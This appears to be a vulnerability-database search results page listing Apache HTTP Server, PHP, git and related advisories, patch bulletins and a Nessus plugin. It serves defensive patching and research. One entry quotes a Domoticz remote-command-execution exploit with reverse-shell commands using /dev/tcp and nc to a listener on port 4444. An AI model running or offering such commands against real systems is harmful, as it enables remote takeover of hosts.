11650 matches found
Denial Of Service (DoS) And Remote Code Execution (RCE)
PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user...
Denial Of Service (DoS)
PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user...
Denial Of Service (DoS)
PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user...
Arbitrary Code Execution
PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user...
Domoticz 4.10577 - Unauthenticated Remote Command Execution Exploit
Exploit for multiple platform in category web applications #!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...
EulerOS 2.0 SP3 : httpd (EulerOS-SA-2019-1294)
According to the version of the httpd packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - In Apache HTTP Server 2.4 release 2.4.37 and prior, mod_session checks the session expiry time before decoding the session. This causes session expir...
EulerOS 2.0 SP5 : git (EulerOS-SA-2019-1291)
According to the version of the git packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - git: arbitrary code execution via .gitmodules CVE-2018-17456 Note that Tenable Network Security has extracted the preceding description block directly...
NGINX Unit HTTP Server Detection
Nessus was able to detect the NGINX Unit HTTP server by looking at the HTTP banner on the remote host. # (C) Tenable Network Security, Inc. include("compat.inc"); if (description) { script_id(124336); script_version("1.4"); script_set_attribute(attribute:"plugin_modification_date", value:"2022/10/12");...
Amazon Linux 2 : mod_http2 (ALAS-2019-1197)
In Apache HTTP server versions 2.4.37 and prior, by sending request bodies in a slow loris way to plain resources, the h2 stream for that request unnecessarily occupied a server thread cleaning up that incoming data. This affects only HTTP/2 (mod_http2) connections. (CVE-2018-17189) (C) Tenable Network...
Security Bulletin: IBM Security SiteProtector System is affected by Apache HTTP Server vulnerabilities
Summary IBM Security SiteProtector System has addressed the following vulnerabilities in Apache HTTP Server. Vulnerability Details CVEID: CVE-2018-11759 DESCRIPTION: Apache Tomcat JK (mod_jk) Connector could allow a remote attacker to traverse directories on the system, caused by the improper handli...
Low: mod_http2
Issue Overview: In Apache HTTP server versions 2.4.37 and prior, by sending request bodies in a slow loris way to plain resources, the h2 stream for that request unnecessarily occupied a server thread cleaning up that incoming data. This affects only HTTP/2 (mod_http2) connections. (CVE-2018-17189)...
The vulnerability of the Perl module of the Apache HTTP Server, related to the injection of code into the .htaccess file of the user, allows a hacker to execute arbitrary code.
The vulnerability of the Perl module used by the Apache HTTP Server is related to the injection of code into the .htaccess file of the user’s directory. Exploiting this vulnerability allows a remote attacker to execute arbitrary Perl code on behalf of the user, thereby executing Apache HTTP serve...
Security Bulletin: Multiple vulnerabilities in Apache HTTP Server affect IBM Cognos Business Intelligence
Summary This bulletin addresses several security vulnerabilities in Apache HTTP Server that are fixed in IBM Cognos Business Intelligence. Vulnerability Details CVEID: CVE-2016-0736 DESCRIPTION: Apache HTTPD could allow a remote attacker to obtain sensitive information, caused by an error in...
Security Bulletin: Apache HTTP Server vulnerability in IBM WebSphere Application Server shipped with IBM Tivoli Netcool Performance Manager (CVE-2018-17199)
Summary Apache HTTP Server vulnerability has been identified in WebSphere Application Server. WebSphere Application Server is shipped with Tivoli Netcool Performance Manager. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulleti...
Security Bulletin: Multiple vulnerabilities in IBM HTTP Server used by WebSphere Application Server (CVE-2019-0211 CVE-2019-0220)
Summary There are multiple vulnerabilities in the IBM HTTP Server used by WebSphere Application Server. CVE-2019-0211 affects version 9 non-windows platforms only. Vulnerability Details CVEID: CVE-2019-0220 DESCRIPTION: Apache HTTP Server could provide weaker than expected security, caused by URL...
Apache: Privilege escalation
Background The Apache HTTP server is one of the most popular web servers on the Internet. Description A vulnerability was discovered in Apache with MPM event, worker, or prefork. Impact An attacker could escalate privileges. Workaround There is no known workaround at this time. Resolution All...
Oracle Primavera Unifier Multiple Vulnerabilities (Apr 2019 CPU)
According to its self-reported version number, the Oracle Primavera Unifier installation running on the remote web server is 16.x prior to 16.2.15.7 or 17.7.x prior to 17.12.10 or 18.x prior to 18.8.6. It is, therefore, affected by multiple vulnerabilities: - A deserialization vulnerability in...
Oracle Fusion Middleware Oracle HTTP Server (Apr 2019 CPU)
The version of Oracle HTTP Server installed on the remote host is affected by a stack-based buffer overflow as noted in the April 2019 CPU advisory. The condition exists in the included cURL library due to using unsigned math when preventing the overflow. An unauthenticated, remote attacker can...
openSUSE Security Update : apache2 (openSUSE-2019-1209)
This update for apache2 fixes the following issues : - CVE-2019-0211: A flaw in the Apache HTTP Server allowed less-privileged child processes or threads to execute arbitrary code with the privileges of the parent process. Attackers with control over CGI scripts or extension modules run by the...
CentOS 7 : mod_auth_mellon (CESA-2019:0766)
An update for mod_auth_mellon is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability...